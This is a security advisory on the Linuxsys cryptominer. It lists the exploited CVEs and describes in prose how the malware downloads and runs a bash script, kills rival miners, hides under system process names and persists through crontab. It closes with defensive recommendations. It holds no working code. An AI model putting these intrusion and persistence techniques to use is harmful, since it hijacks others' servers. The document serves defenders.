Linuxsys Cryptominer: A New Evasive Threat Targeting Linux Servers

The Linuxsys campaign leverages a blend of misdirection and lightweight binaries to infiltrate Linux servers. Its core operations focus on process masquerading, memory-resident binaries, and frequent self-updating mechanisms to ensure persistence and avoid detection. The malware connects to hardcoded IPs and hosts, downloads additional payloads, and uses base64 encoding and customized bash scripts to execute the miner.

Severity Level: High

Threat Overview

• Linuxsys Cryptominer is a cryptojacking malware specifically designed to infiltrate Linux systems and covertly mine cryptocurrency by hijacking system resources.
• All Linux-based systems with exposed SSH or web services are vulnerable.
• Exploited Vulnerabilities: CVE-2021-41773, CVE-2023-22527, CVE-2023-34960, CVE-2023-38646, CVE-2024-0012, CVE-2024-9474, CVE-2024-36401.
• Primary Payload: kthreaddi, a Monero (XMR) miner
• Affected Regions: Primarily global in scope; no specific country targeting mentioned.
• Affected Sectors: Any organization running exposed Linux systems.

Exploitation Steps

1. Initial Access – Script Download via Curl/Wget: A compromised Linux host is instructed (manually or via automated script) to download a bash script (eliox.sh) from a malicious server.
2. Execution – Launching the Installer Script: The downloaded script is executed via bash, kills existing known cryptomining processes such as kdevtmpfsi and bioset, disables security mechanisms like watchdogs, manipulates directories such as /var/tmp and /dev/shm, and establishes persistence through scheduled crontab entries.
3. Payload Delivery – Fetching the Miner and Watchdog: The script downloads additional binaries like kthreaddi (the miner) and watchdogs. These are memory-resident or dropped with disguised process names to evade detection.
4. Execution of Miner: The Monero (XMR) mining binary is launched under a deceptive name. It uses TLS-based mining pools to hide network activity.
5. Persistence Mechanism – Crontab Installation: A crontab entry is created to repeatedly download and execute the script (ensuring reinfection even after a reboot or binary removal).
6. Obfuscation and Masquerading: Binaries are renamed to mimic legitimate system processes: kworker, bioset, kdevtmpfsi, etc. Files are stored in uncommon or semi-temporary directories: /var/tmp, /dev/shm.
7. Update and Version Control: The bash script (eliox.sh) is periodically updated on the server. The crontab ensures infected systems always pull the latest version.

Recommendations

1. Urgently patch all systems vulnerable to listed CVEs.
2. Enforce web application firewalls (WAFs) and restrict outbound curl/wget behavior from web servers.
3. Hunt for unauthorized cron jobs (e.g., scripts named cron.sh) in /etc/cron.*, /var/spool/cron, and user crontabs.
4. Monitor for new system accounts, especially with sudo/root access.
5. Inspect shell history and recently executed scripts in /tmp, /var/tmp, or /dev/shm.
6. Detect and block binaries with names mimicking system processes (kworker, bioset, etc.)
7. Limit root or sudo privileges and enforce SSH key authentication.
8. Audit SSH login attempts and credential usage.
9. Block the IOCs at their respective controls. https://www.virustotal.com/gui/collection/5f04c4db1967557d6568ccafa4524d109d2aba61e5eed02270bbc0667abd8597/iocs

Source:

• https://www.vulncheck.com/blog/linuxsys-cryptominer

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.